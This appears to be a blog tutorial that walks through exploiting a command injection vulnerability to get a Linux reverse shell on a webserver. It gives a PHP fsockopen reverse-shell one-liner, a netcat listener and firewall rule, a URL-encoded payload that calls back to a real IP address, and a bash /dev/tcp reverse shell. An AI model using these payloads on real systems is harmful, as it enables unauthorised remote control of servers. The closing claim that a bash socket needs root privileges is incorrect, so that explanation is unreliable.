In this scenario we will utilize a command injection vulnerability to obtain a linux reverse shell prompt on the victim webserver.

The command injection vulnerability we will be using has been demonstrated in a previous blog post found here.

Before we do this, we will need a some kind of shell script or command to pull this off.  A great resource for reverse shell’s can be found here at pentestmonkey.net.

For this example we will use the following php command to obtain a shell prompt.

php -r '$sock=fsockopen("127.0.0.1",8080);exec("/bin/sh -i <&3 >&3 2>&3");'

In the above command you will need to change the loopback IP address of 127.0.01 to your attack server’s IP address.  You can also change the port of 8080 to whatever you desire, as long as it is free.  We will continue using port 8080 for this example.

On our attack server, which is running Ubuntu 16.0, we will need to open up the firewall to allow port 8080.  If you change the port in this example, simply replace 8080 with the port number you are using.

The following command will open up port 8080 on our Ubuntu attack server:

ufw allow 8080

Next, we will need to start a netcat listener on port 8080, with the command below.  Netcat is a basic network socket I/O program.  With it listening on port 8080, we can “catch” the bash shell that the victim server will send us when we inject the php command above.

nc -nlvp 8080

Lastly, we will need to URL encode the php injection command before we inject it to the victim webserver.  Use your favorite serach engine and search for ‘Url encode’ find many free URL encoders that can be used.

Below is our URL encoded string.  In some places I blocked out my IP address but realized later that it really does not matter.  When I am not testing I take down the vulnerable web pages anyway.  Sometimes you will see my IP blocked out, other times it is not.

php%20-r%20%27%24sock%3Dfsockopen%28%22142.93.51.71%22%2C8080%29%3Bexec%28%22%2Fbin%2Fsh%20-i%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27

As you can see from the screen shot below, I was able to inject the URL encoded command above, and then received a linux shell that was sent to the attacking machine.

There are plenty of other methods to try and acquire a shell.  In this example we used a php command to get our shell.  You can possibly also use ruby, perl, python, java, xterm or bash as well.  It really depends on what is installed on the server and what command you can sneak through.

I also tried with a bash shell, using the command below.

bash -i >& /dev/tcp/142.93.51.71/8080 0>&1

Although this worked from the command line on the victim server, it did not work when URL encoded and injected.  I suspect it is because for the bash command to succeed, it needs root privileges to create a socket.  The php command did not need root privileges.